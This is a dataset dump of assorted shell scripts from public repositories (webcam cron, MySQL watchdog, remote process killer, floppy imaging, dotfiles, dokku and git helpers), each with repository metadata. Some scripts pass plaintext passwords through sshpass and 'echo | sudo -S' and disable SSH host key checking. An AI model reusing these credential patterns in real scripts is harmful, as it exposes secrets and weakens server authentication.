*/30 * * * * bash /home/cam.sh > /home/.../.../log/crontab.camera.log 2>&1
# 아래 실행 명령은 crontab 에서는 동작하지 않음
# *.sh 파일로 저장하고 실행해야 함, 위 처럼, bash /home/tinyos/cam.sh 로 실행
# fswebcam -r 1280*960 /home/.../web/png/image_$(date '+%Y-%m-%d_%H:%M:%S').jpg
# cam.sh
#
#dest='{SRC}'
#
# fswebcam -r 1280*960 /home/.../web/png/image_$(date '+%Y-%m-%d_%H:%M:%S').jpg
#
# @hourly echo "password" | sudo -S rm somefile
# sudo chowm www-data -R /home/.../web/png
# sudo find /home/.../web/png -name image_* -mtime +14 -delete
# sudo rsync -avhz --partial --progress /home/.../web/png $dest
# sleep 30
# sudo docker exec -i -u 33 ..._app_1 php occ files:scan --all
#
# sudo chown www-data -R /home/tinyos/devel_opment/nextcloud/volume/nextcloud_volume/data/tinyos/files/Photos/office
# dest='/home/...id.../devel_opment/nextcloud/volume/nextcloud_volume/data/...id.../files/Photos'
# (참고) rsync --rsh="sshpass -p myPassword ssh -l username" server.example.com:/var/www/html/ /backup/
| true
|
f4922418b7a1f343da26e52567ef94f6467d5968
|
Shell
|
gnpok/shell
|
/mysqlOperation/webService_isRunning.sh
|
UTF-8
| 760
| 3.625
| 4
|
[] |
no_license
|
#!/bin/bash
#
# Check that the web-stack services are running and start any that are not;
# additionally ping MySQL via mysqladmin and, if it is down, e-mail an
# alert and restart it.
#
# BUG FIXES: the original had many missing-space syntax errors that broke
# it: '/usr/bin/mysqladminping' (should be 'mysqladmin ping'),
# 'if[[ "$result"!= "$expected"]]', 'echo"..."' variants,
# 'mail -s "$SUBJECT""$EMAIL"' and 'sudo/etc/init.d/mysqlrestart'. It also
# ran `service $S start` in backticks, which would try to execute the
# command's output.

# Start any of these services missing from the process tree.
soft=(nginx php-fpm mysqld redis)
for S in "${soft[@]}"; do
    if ! pstree | grep -q "$S"; then
        service "$S" start
    fi
done

# Dedicated MySQL liveness probe: 'mysqladmin ping' prints
# "mysqld is alive" when the server answers.
result=$(/usr/bin/mysqladmin ping)
expected='mysqld is alive'
if [[ "$result" != "$expected" ]]; then
    echo "It's dead - restart mysql"
    # email subject
    SUBJECT="[MYSQL ERROR] - Attempting to restart service"
    # Email To ?
    EMAIL="info@endyourif.com"
    # Email text/message
    EMAILMESSAGE="/tmp/emailmessage.txt"
    echo "$result was received" > "$EMAILMESSAGE"
    echo "when we were expected $expected" >> "$EMAILMESSAGE"
    # send an email using /bin/mail
    mail -s "$SUBJECT" "$EMAIL" < "$EMAILMESSAGE"
    sudo /etc/init.d/mysql restart
fi
| true
|
96e0b586aa85641b4f04193f71ecd67c85ea56b6
|
Shell
|
vsmaxim/infotecs-sysadm-test
|
/pskiller
|
UTF-8
| 666
| 3.5625
| 4
|
[] |
no_license
|
#!/bin/bash
#
# Kills processes from sudo via ssh
#
# Usage: pskiller <process-name-pattern> <passwd-file> <host> [<host> ...]
# The password file supplies four lines: ssh username, ssh password,
# optional username to kill as, and that user's password.
# SECURITY NOTE(review): passwords are passed via sshpass -p and echo,
# which exposes them in process listings on both ends.
if [[ -z $3 ]]; then
echo "Usage: pskiller ids /path/to/passwds.txt [ip/hostname] ..." >& 2
exit 1
fi
# Read the four credential lines from the password file on fd 3.
exec 3< $2
read username <&3
read password <&3
read killingUsername <&3
read killingPassword <&3
exec 3<&-
# For every host argument (positions 3..N), run the kill sequence remotely.
# The heredoc below is expanded locally (unescaped ${...}), so credentials
# and $1 are baked into the remote script; \$(pgrep ...) runs remotely.
# NOTE(review): the 'echo Hexxxx > ~/test.txt' line looks like leftover
# debug output written to the remote home directory — confirm and remove.
for host in ${@:3}; do
sshpass -p ${password} ssh -o "StrictHostKeyChecking no" -T ${username}@${host} << EOF
if [[ -z "${killingUsername}" ]]; then
echo ${password} | sudo -S kill \$(pgrep $1) || sudo -S kill -9 \$(pgrep $1)
else
echo Hexxxx > ~/test.txt
echo ${killingPassword} | sudo -S -u ${killingUsername} kill \$(pgrep $1) || sudo -S -u ${killingUsername} kill -9 \$(pgrep $1)
fi
EOF
done
| true
|
2383c12709d0a422e4cb26db221362f6e15a2b61
|
Shell
|
nvanderperren/ResurrectionLab
|
/liberaal_archief_mac_floppies.sh
|
UTF-8
| 2,875
| 3.875
| 4
|
[
"CC-BY-4.0"
] |
permissive
|
#!/bin/bash
#
# script to more or less automate the imaging of Macintosh formatted floppies
# for Liberaal Archief
# author: Nastasia Vanderperren (PACKED vzw)
# script written for macOS and OS X systems
# prerequisites: ClamAV, kryoflux software, hfsutil, siegfried and bagit.py
# source: John Durno, http://journal.code4lib.org/articles/11986
#
#############################################################
# parameters
if [ $# == 0 ]
then # if there is no parameter
echo "No arguments found."
echo "Give a name to the floppy image: "
read UI
else
UI=$1 # this is the name you give to the image
fi
# NOTE(review): $UI is used unquoted throughout; names with spaces will
# break mkdir/dtc/rsync below — confirm callers only use simple names.
#create directory for the image and its metadata
echo "Creating folder structure for image and its metadata..."
mkdir $UI
cd $UI
mkdir image content meta
echo "Done creating folder structure!"
# create an image of the files with the kryoflux
echo "Creating image with the kryoflux controller..."
# create Apple DOS 400/800K sector image
# -i0 writes the raw KryoFlux stream, -i9 the sector image; all output is
# captured into a per-image log.
dtc -p -fimage/$UI/$UI -i0 -fimage/$UI.img -i9 2>&1 | tee meta/image_$UI.log
diskimage=image/$UI.img
rsync -a $diskimage handlingcopy.img # create handling copy
handling=handlingcopy.img
echo "Done creating image!"
# create an MD5 checksum
echo "Creating md5 checksum..."
md5 $diskimage > meta/checksum.txt
echo "Done creating checksum!"
# identify the file system
echo "Identifying the file system..."
disktype $handling > meta/disktype.txt
echo "Done identifying the file system!"
# get the contents and structure of the files on the disk
echo "Extracting files and folders of image..."
hmount $handling > meta/hmount.txt # keep this until better way found to get this information
hls -i -a -l -R > meta/index.txt
# hcopy -m :* content/
humount
# maybe better this way:
# Mount read-only via hdiutil; collapse whitespace so the output becomes
# "<device> <mountpoint>" on one line for easy splitting.
hdiutil attach -readonly $handling | sed -E 's/[[:space:]]+/ /g' > mount.txt # store information in helper txt file
# use the mount.txt file to split mounting location and device location in variables
mount_and_dev_string=$(<mount.txt)
dev_location=${mount_and_dev_string%%' '*}
mount_location=${mount_and_dev_string#*' '}
if [ ! -z "$mount_location" ]; then
rsync -ra "$mount_location"/ content/ # copy files using rsync
fi
hdiutil detach "$dev_location"
rm mount.txt # delete helper txt file
echo "Done extracting files and folders!"
# to do: file characterization
echo "Start characterizing the files of the disk..."
sf -hash md5 -z -csv content > meta/file_identification.csv # creates also checksum for each file
echo "Done characterizing files!"
# scan the image
echo "Scanning the image"
# NOTE(review): freshclam normally updates with no arguments; confirm
# "-update" is accepted by the installed version.
freshclam -update # update virus database
clamscan -r --bell $handling content/ > meta/virusscan.txt
echo "Done scanning the image!"
# delete handlingcopy
rm $handling
# place everything in a bag
#echo "Creating BagIt for files..."
#cd ..
#bagit.py $UI
#echo "Done creating BagIt!"
echo "Done processing Macintosh floppy!"
# Terminal bell to signal completion.
echo -ne '\a'
| true
|
49e05f90aa13ddf6477162c8c2698676e4649802
|
Shell
|
liguang8212/python-code-encryption
|
/build_py_to_pyc.sh
|
UTF-8
| 472
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/sh
##########################################################
# Author: LiGuang
# Create Date: 2021/07/22
# Version: 1.0
##########################################################
# Compile every .py file under the given directory to an optimized .pyc
# placed next to its source (-b), then delete the .py originals.
# Usage: build_py_to_pyc.sh <source-dir>
src_dir=$1
# Quoted so an empty/空格 argument is handled correctly.
if [ ! -d "$src_dir" ]; then
echo "source code dir does not exist!"
# BUG FIX: the script previously printed the error and then fell through,
# running compileall and a destructive find/rm against a bad path.
exit 1
fi
python -O -m compileall -b "$src_dir"
find "$src_dir" -name '*.py' -type f -print -exec rm {} \;
# BUG FIX: message typo "romve" -> "remove".
echo "Finished to remove the py files "
#python -m py_compile test.py
#python -O -m py_compile test.py
| true
|
86caaa59f56d68374066a01b54df20cf6f5620b0
|
Shell
|
jcherven/dotfiles-debian
|
/initDotfiles.sh
|
UTF-8
| 2,188
| 3.53125
| 4
|
[] |
no_license
|
#!/bin/bash
# Bootstrap script for the dotfiles-debian repository: creates required
# config directories, backs up any existing dotfiles, and symlinks the
# repository copies into $HOME. Exits on the first failed command (set -e).
set -e
# Some setup of directories that will be used by dotfiles
# Listing of directories needed by dotfiles. Add new needed entries to this array.
DIRECTORIES=(
# directories needed in ~/.config
"$HOME/.config/nvim"
"$HOME/.config/git"
)
# Create directories defined in DIRECTORIES array. Requires /bin/bash for C-style looping to access array indexes
for ((j=0; j<${#DIRECTORIES[@]}; ++j)); do
if [ ! -d "${DIRECTORIES[$j]}" ]; then
mkdir -p "${DIRECTORIES[$j]}"
fi
done
# Symlinked files
# Listing of symlinks for files that are located in ~/
FILESLOCAL=( # items correspond to FILESLINKED by index order
# Xorg configs
"$HOME/.Xresources"
# bash and other shell configs
"$HOME/.bash_profile"
"$HOME/.bashrc"
"$HOME/.profile"
# tmux
"$HOME/.tmux.conf"
# git global configs
"$HOME/.config/git/config"
"$HOME/.config/git/ignore"
# other applications
"$HOME/.lynxrc"
)
FILESLINKED=(
# Xorg configs
"$HOME/dotfiles-debian/Xresources"
# bash and other shell configs
"$HOME/dotfiles-debian/bash_profile"
"$HOME/dotfiles-debian/bashrc"
"$HOME/dotfiles-debian/profile"
# tmux
"$HOME/dotfiles-debian/tmux.conf"
# git global configs
"$HOME/dotfiles-debian/config/git/config"
"$HOME/dotfiles-debian/config/git/ignore"
# other applications
"$HOME/dotfiles-debian/lynxrc"
)
# Set the ~/ dot file symlinks defined in FILESLINKED {{{
# requires a c-style loop to access array index numbers
# Existing files are renamed with a ".old.<date>" suffix before linking.
# NOTE(review): '-e' is false for a *broken* symlink, so a dangling link at
# the target path would make 'ln -s' fail and abort the script (set -e) —
# confirm whether that case needs handling.
for ((i=0; i<${#FILESLOCAL[@]}; ++i)); do
if [ -e "${FILESLOCAL[$i]}" ];
then
mv "${FILESLOCAL[$i]}" "${FILESLOCAL[$i]}.old.$(date +%c)"
fi
ln -s "${FILESLINKED[$i]}" "${FILESLOCAL[$i]}"
done
# }}}
# Call software bootstrap install/config scripts {{{
# MacOS 13
#if [[ "$OSTYPE" == "darwin"* ]]; then
#	# Install the OS's basic environment bootstrap apps (currently supports MacOS)
#	source "$HOME/dotfiles/initscripts/swbootstrap.sh"
#	# Set macos 13 system settings
#	source "$HOME/dotfiles/initscripts/macosinit.sh"
#fi
# Debian
#if [[ "$OSTYPE" == "linux-gnu" ]]; then
#	source "$HOME/dotfiles/initscripts/debianinit.sh"
#fi
#}}}
echo "initDotfiles.sh has completed."
# ex: set foldmethod=marker:
| true
|
11e639531f863a2c732e53a464a1a4e4b88a7021
|
Shell
|
nicolasgalvez/procyon-wordpress
|
/bin/remote-setup
|
UTF-8
| 1,552
| 4.0625
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# This script will setup git on the remote Digital Ocean server.
# It will create a branch called 'live' so you can deploy to the live server with a git push.
# It will move the current website to a directory called html.bak.
# Based on the steps here: https://www.digitalocean.com/community/tutorials/how-to-set-up-automatic-deployment-with-git-with-a-vps
# DO NOT USE on an existing server unless you really know what you are doing.
source bin/include/loadenv
set -e
echo "WARNING: This script will modify your live server. Do not run on an existing wordpress setup unless you are sure you know what you are doing."
read -p "Continue (y/n)?" choice
# BUG FIX: previously every branch of this case only echoed a message and
# the script carried on modifying the server even after answering "n" (or
# anything else). Now only an explicit yes proceeds.
case "$choice" in
  y|Y ) echo "yes";;
  n|N ) echo "no"; exit 1;;
  * ) echo "invalid"; exit 1;;
esac
# Setup git on the remote server using the script in includes dir.
ssh "$REMOTE_USER"@"$REMOTE_HOST" 'bash -s' < bin/include/remote-git-setup
# Create remote git branch
git remote add live ssh://"$REMOTE_USER"@"$REMOTE_HOST"/var/repo/live.git
# git remote add staging ssh://$REMOTE_USER@$REMOTE_HOST/repo/staging.git
# Do first deploy
git push live -f
# Move the default wordpress installation, and copy the generated htaccess and wp-config.php.
ssh "$REMOTE_USER"@"$REMOTE_HOST" 'cd /var/www
mv html html.bak
ln -s live/wordpress html
cp html.bak/wp-config.php html/
cp /var/www/html.bak/.htaccess /var/www/live/wordpress/'
# change permissions to the web user or uploads and stuff like that won't work.
ssh "$REMOTE_USER"@"$REMOTE_HOST" 'chown -R www-data:www-data /var/www/html/*'
| true
|
d573a282e5cb5fd580c0b86168f3a912ddcbc0ba
|
Shell
|
mattbdean/CyanideViewer
|
/scripts/pull_db.sh
|
UTF-8
| 954
| 3.796875
| 4
|
[] |
no_license
|
#!/bin/bash
# Pull the app's SQLite database off an Android device via adb, then open it
# in a browser/CLI. $PACKAGE, $ANDROID_LOCATION, $DB_NAME and
# $PREFERRED_BROWSER come from settings.sh.
# http://stackoverflow.com/a/246128/1275092
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
source "$DIR"/settings.sh
# First, run as the application and make the database world readable and world writable
# Then, pull the database
# Finally, run as the application and make the database readable and writable to the owner
# http://stackoverflow.com/a/18472135/1275092
if adb shell "run-as $PACKAGE chmod 666 $ANDROID_LOCATION" \
&& adb pull "$ANDROID_LOCATION" "$DIR/$DB_NAME" \
&& adb shell "run-as $PACKAGE chmod 600 $ANDROID_LOCATION"; then
# Only launch the browser if the file was pulled successfully
if command -v "$PREFERRED_BROWSER" 2>/dev/null; then
# SQLiteBrowser exists, use it
"$PREFERRED_BROWSER" "$DIR/$DB_NAME"
elif command -v sqlite3 2>/dev/null; then
# Use the command line instead
sqlite3 "$DIR/$DB_NAME"
else
echo >&2 "The database was pulled, but no application was found to open it."
fi
fi
| true
|
d5782d3c6a251459f2469d29ffb64d6d7858dd4f
|
Shell
|
lorthal/IAD2
|
/runpart1.sh
|
UTF-8
| 670
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/bash
# Part-1 experiment driver: for network sizes 2, 4, ..., 20, run runprog.sh
# with both training methods (neural_gas, kohonen) on two point patterns
# (square + circle, and square only). Output files are named after the
# size, method and pattern.
prog="/mnt/d/Semestr 6/IAD/Zad2/runprog.sh"
epochs=1000
rate=0.6
seed=3
for (( size = 2; size <= 20; size += 2 )); do
"$prog" -e $epochs -n $size -l $rate -s $seed -m "neural_gas" -o "${size}_neural_gas_square_circle_output.txt" -p "square_filled -3 0 1 150 circle 3 0 2 150"
"$prog" -e $epochs -n $size -l $rate -s $seed -m "neural_gas" -o "${size}_neural_gas_square_output.txt" -p "square_filled 0 0 3 300"
"$prog" -e $epochs -n $size -l $rate -s $seed -m "kohonen" -o "${size}_kohonen_square_circle_output.txt" -p "square_filled -3 0 1 150 circle 3 0 2 150"
"$prog" -e $epochs -n $size -l $rate -s $seed -m "kohonen" -o "${size}_kohonen_square_output.txt" -p "square_filled 0 0 3 300"
done
| true
|
7d59b9772cd2138a481964f895cfc5b6fa7ab1be
|
Shell
|
Piyoshi/dotfiles
|
/.zshrc
|
UTF-8
| 1,390
| 2.578125
| 3
|
[] |
no_license
|
fpath+=~/.zfunc
source ~/alias
source ~/.myshrc
# Use vcs_info, zsh's helper for collecting VCS (git etc.) status.
autoload -Uz vcs_info
# Display format for the branch information:
#   %b  branch name
#   %a  action name (e.g. merge)
zstyle ':vcs_info:*' formats '[%b]'
zstyle ':vcs_info:*' actionformats '[%b|%a]'
precmd () {
  psvar=()
  LANG=en_US.UTF-8 vcs_info
  [[ -n "$vcs_info_msg_0_" ]] && psvar[1]="$vcs_info_msg_0_"
}
# Enable colours by name.
autoload colors
colors
# Define LS_COLORS.
export LS_COLORS='di=34:ln=35:so=32:pi=33;ex=31;bd=46;34;cd=43;34;su=41;30:sb=46;30:tw=42;30:ow=43;30'
# Colourize file-name completion candidates.
zstyle ':completion:*' list-colors ${(s.:.)LS_COLORS}
autoload -U compinit
# BUG FIX: this line was "compinit -u#" — a '#' fused to a word does not
# start a comment, so compinit received the bogus option "-u#".
compinit -u
# Case-insensitive completion (upper-case input still only matches
# upper-case candidates).
zstyle ':completion:*' matcher-list '' 'm:{a-z}={A-Z}' '+m:{A-Z}={a-z}'
# Colourize completion candidates.
zstyle ':completion:*' list-colors ${(s.:.)LS_COLORS}
# Select completion candidates with the arrow keys.
zstyle ':completion:*:default' menu select=2
#THIS MUST BE AT THE END OF THE FILE FOR SDKMAN TO WORK!!!
export SDKMAN_DIR="/Users/satopiyo/.sdkman"
[[ -s "/Users/satopiyo/.sdkman/bin/sdkman-init.sh" ]] && source "/Users/satopiyo/.sdkman/bin/sdkman-init.sh"
| true
|
d9168bae702250d4b57bb049be8e7d61da657235
|
Shell
|
eXolnet/exolnet-macos-toolbox
|
/bin/exo-software-select
|
UTF-8
| 1,461
| 4.15625
| 4
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Interactive software selector for the eXolnet macOS toolbox: shows the
# main preference menu, then a sub-menu per selected category, persisting
# choices under $STORAGE_PREFERENCES_DIR.
# Helper functions (e_header, e_success, e_arrow, show_preferences_menu,
# read_preferences, create_directory) come from "$TOOLBOX/lib/include".
#
# Script setup
#
# Define toolbox directory if not set
if [[ -z "$TOOLBOX" ]]; then
TOOLBOX="$HOME/.exolnet/toolbox"
fi
# Check if toolbox directory exists
if [[ ! -d "$TOOLBOX" ]]; then
echo "Directory ~/.exolnet does not exists, exiting ..."
exit 1
fi
# Source helpers
. "$TOOLBOX/lib/include"
#
# Script checks
#
# Check if homebrew shell environment variables are defined
if [[ -z "$HOMEBREW_PREFIX" ]]; then
echo
echo "Homebrew environment variables are missing."
echo "They must be present in your shell profile in order for this script to run."
exit 1
fi
# Check if command was ran as root.
if [[ $(id -u) -eq 0 ]]; then
echo
echo "The command \"$(basename "$0")\" should not be executed as root or via sudo directly."
echo "When a command requires root access, you will be prompted for a password as needed."
exit 1
fi
#
# Script execution
#
if [[ ! -d "$STORAGE_PREFERENCES_DIR" ]]; then
e_header "Warming up"
create_directory "$STORAGE_PREFERENCES_DIR"
fi
e_header "Displaying preference menus"
show_preferences_menu main
e_success "Saved main preferences"
# read_preferences returns a scalar list; the unquoted expansion below is
# relied upon to word-split it into individual items.
MAIN_PREFERENCES=$(read_preferences main)
for item in ${MAIN_PREFERENCES[@]}; do
show_preferences_menu "$item"
e_success "Saved $item preferences"
done
# Skip the hint when running as part of a larger install script.
if [[ -z "$MAIN_INSTALL_SCRIPT" ]]; then
e_header "What's next?"
e_arrow "Run 'exo-software-install' to install the selected software"
fi
| true
|
945875a5e3a20fefff068231407026d2963cb505
|
Shell
|
srr013/dokku
|
/plugins/ssh-keys/subcommands/list
|
UTF-8
| 404
| 3.21875
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Dokku subcommand: ssh-keys:list — list the SSH key hashes known to the
# dokku user. verify_ssh_key_file and sshcommand come from the sourced
# plugin function files.
set -eo pipefail
# Enable command tracing when DOKKU_TRACE is set.
[[ $DOKKU_TRACE ]] && set -x
source "$PLUGIN_CORE_AVAILABLE_PATH/common/functions"
source "$PLUGIN_AVAILABLE_PATH/ssh-keys/functions"
cmd-ssh-keys-list() {
  declare desc="List ssh key hashes"
  declare cmd="ssh-keys:list"
  # Drop the subcommand name if dokku passed it as the first argument.
  [[ "$1" == "$cmd" ]] && shift 1
  # Optional key-name filter; empty lists all keys.
  declare SSH_NAME="$1"
  verify_ssh_key_file
  sshcommand list dokku "$SSH_NAME"
}
cmd-ssh-keys-list "$@"
| true
|
5758027c9433cc35db2e3c67a8561a265748e62c
|
Shell
|
mariusae/make-emacs
|
/make-emacs
|
UTF-8
| 1,143
| 4.09375
| 4
|
[] |
no_license
|
#!/bin/bash
#
# Make a standalone emacs configuration.
#
# Packs an ~/.emacs.d directory (or a single init file) into a
# self-extracting shar-based launcher script: on first run it unpacks to
# /tmp/emacs.<hash>, then (and on every later run) starts emacs with -q
# loading the unpacked init file.
set -e
if [ $# -ne 2 ]; then
# NOTE(review): '> /dev/null 1>&2' redirects fd1 twice; the last wins, so
# the usage message ends up on stderr — confirm the /dev/null was intended.
echo "`basename $0` <emacs.d-directory|emacs-init-file> <output file>" \
> /dev/null 1>&2
exit 1
fi
# Prefer GNU md5sum; fall back to BSD/macOS md5.
if which md5sum > /dev/null; then
MD5=md5sum
else
MD5=md5
fi
EMACSD=$1
OUTPUT=$2
# Force absolute path for $OUTPUT.
OUTPUT=$(cd `dirname $OUTPUT`; echo $PWD/`basename $OUTPUT`)
# Directory mode: hash the file listing; single-file mode: hash the file.
# .elc files are excluded so recompiles don't change the hash.
if [ -d $EMACSD ]; then
cd $EMACSD
UNIQUE=`find . \! -name '*.elc' -ls | $MD5`
INIT="init.el"
FILES=`find . \! -name '*.elc' -print`
else
UNIQUE=`$MD5 < $EMACSD`
INIT=$EMACSD
FILES=$EMACSD
fi
# First 6 hex chars of the hash name the /tmp cache directory.
UNIQUE=${UNIQUE:0:6}
# Build the launcher: shar archive with an injected prologue (fast path if
# already extracted, else mkdir+cd), the original 'exit' tail stripped, and
# an epilogue that returns to the caller's directory and execs emacs.
shar $FILES \
| sed -e "1 i\\
DIR=/tmp/emacs.$UNIQUE; if [ -d \$DIR ] ; then emacs -q -l \$DIR/$INIT \"\$@\"; exit; fi; echo \"extracting emacs.d..\"; OLDDIR=\$PWD; mkdir -p \$DIR; cd \$DIR" \
| sed -e "1 i\\
UNIQUE=$UNIQUE" \
| sed -e '1 i\
#!/bin/sh' \
| sed -e '/^exit/,$ d' \
| sed -e "$ a\\
cd \$OLDDIR; emacs -q -l \$DIR/$INIT \"\$@\"" \
| sed -e 's/^echo . .*//' \
> $OUTPUT
chmod 0744 $OUTPUT
| true
|
b1011a09c66d19b59ad787600d7b48430ba59efc
|
Shell
|
dockerpirate/dovecot
|
/rootfs/usr/local/bin/dovecot-wrapper
|
UTF-8
| 727
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/sh
# Container entrypoint wrapper: derive the installed dovecot package id,
# re-run its APK post-install hook, then exec dovecot in the foreground.
# Parse dovecot version string from the APK database
# The awk program walks /lib/apk/db/installed (colon-separated "key:value"
# records): C = package id/checksum, P = name, V = version. Once all three
# are seen for a record, it prints "name-version.id" for dovecot and resets.
DOVECOT_VERSION_STRING="$(
	awk -- '
	BEGIN {
		PKGID = ""
		PKGNAM = ""
		PKGVER = ""
		FS = ":"
	}
	{
		if($1 == "C") {
			PKGID = $2
		} else if($1 == "P") {
			PKGNAM = $2
		} else if($1 == "V") {
			PKGVER = $2
		}
		if(PKGID && PKGNAM && PKGVER) {
			if(PKGNAM == "dovecot") {
				print PKGNAM "-" PKGVER "." PKGID
			}
			PKGID = ""
			PKGNAM = ""
			PKGVER = ""
		}
	}
	' /lib/apk/db/installed)"
# Re-run dovecot post-install script (to generate the TLS certificates if they're missing)
# The script is extracted from the APK scripts archive to stdout and piped
# straight into sh.
tar -xf "/lib/apk/db/scripts.tar" "${DOVECOT_VERSION_STRING}.post-install" -O | sh
# Start Dovecot as usual
# -F keeps it in the foreground so the container stays alive; exec makes it
# PID 1's direct replacement.
exec dovecot -F
| true
|
60b16cbc4344aeefdc1aeb5dc92f36d09545a5c4
|
Shell
|
ryanmorillo/dotfiles
|
/mutt/scripts/x-face-unicode
|
UTF-8
| 1,451
| 3.671875
| 4
|
[] |
no_license
|
#! /bin/bash
#
# Read a mail message on stdin and output X-Face using unicode block
# characters. Makes the output a 24x24 text block.
# You obviously need a font that supports those.
#
# Created by Patrice Levesque in 2008, donated to the public domain.
# Set this to 0 or 1 depending on your preference
INVERSE=1
# Resolve required tools up front; abort if any is missing.
UNCOMPFACE=`which uncompface` || exit
PRINTF=`which printf` || exit
SED=`which sed` || exit
SEQ=`which seq` || exit
CUT=`which cut` || exit
# Build the 16 quadrant block characters: index is a 4-bit mask of which
# 2x2 sub-cells are set (U+00A0 for empty through U+2588 full block).
COUNT=0;
for i in 00a0 259d 2598 2580 2597 2590 259a 259c 2596 259e 258c 259b 2584 259f 2599 2588; do
UNICHAR[$COUNT]=`${PRINTF} "\u$i"`
let "COUNT += 1"
done
ODDLINES=
EVENLINES=
TOTALCOUNT=0
ARRAYCOUNT=0
# Extract the (possibly folded) X-Face: header, strip the prefix and
# leading whitespace, decode with uncompface, then split the decoded
# hex words alternately into even/odd pixel-row arrays so each text row
# can merge two image rows.
for i in `cat "$@" \
| ${SED} -n -e '/^X-Face:/,/^[^ \t]/ p' \
| ${SED} -n -e 's/^X-Face://' -e '/^[ \t]/ p' \
| ${SED} -e 's/^[ \t]\+//' \
| { ${UNCOMPFACE}; }`; do
if [ $(( $TOTALCOUNT % 2 )) -eq 0 ]; then
EVENLINES[$ARRAYCOUNT]="$i";
else
ODDLINES[$ARRAYCOUNT]="$i";
let "ARRAYCOUNT += 1"
fi
let "TOTALCOUNT += 1"
done
# 24 output rows; each row's 48 pixels come as three comma-separated
# 16-bit hex words per line.
for line in `${SEQ} 0 23`; do
for word in `${SEQ} 1 3`; do
EVEN=$( ${PRINTF} "%d" `echo ${EVENLINES[$line]} | ${CUT} -d, -f$word` )
ODD=$( ${PRINTF} "%d" `echo ${ODDLINES[$line]} | ${CUT} -d, -f$word` )
# We need two bits. Shift then OR, then merge the two lines
for i in `${SEQ} 14 -2 0`; do
T=$((((($ODD >> $i ) & 3) << 2) + (($EVEN >> $i) & 3)))
[[ ${INVERSE} -eq 1 ]] && let "T ^= 15"
echo -n ${UNICHAR[$T]}
done;
done;
echo
done
| true
|
15dace9debd9c1028d93dd1070f2dffd3d846bbb
|
Shell
|
andrewkeller/ak-git-tools
|
/bin/git-repocache-clone-by-name
|
UTF-8
| 1,180
| 4.09375
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
# git-repocache-clone-by-name
#
# Copyright (c) 2013 - 2014, Andrew Keller
#
# A wrapper around git-clone that allows the user to specify the URI of the
# repository using the name of a remote in the repocache instead of the URI
# itself. The repocache is also used for the clone. For example, one may type:
#
# git repocache-clone-by-name <remote name> <additional-git-clone-args>
#
# The name of the remote must be the first argument. Any additional arguments
# are passed to git-clone.
REPOCACHE_DIR=$(git repocache-path) || exit $?
if [ $# -lt 1 ]
then
echo "usage: `basename \"$0\"` <repository name> <additional git-clone args>" >&2
exit 1
fi
REPO_NAME=$1
shift
REPO_URL=$(git --git-dir "$REPOCACHE_DIR" config --get "remote.$REPO_NAME.url")
if [ -z "$REPO_URL" ]
then
echo "`basename \"$0\"`: unknown repository name: '$REPO_NAME'.
Must be one of:
`git --git-dir \"$REPOCACHE_DIR\" remote | perl -pne '$_=" $_";'`" >&2
exit 1
fi
git clone --reference "$REPOCACHE_DIR" "$REPO_URL" "$@" || exit $?
echo "
Warning: The cloned repository does not own all its objects.
You should run \`git disconnect-alternates\` as soon
as possible.
" >&2
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.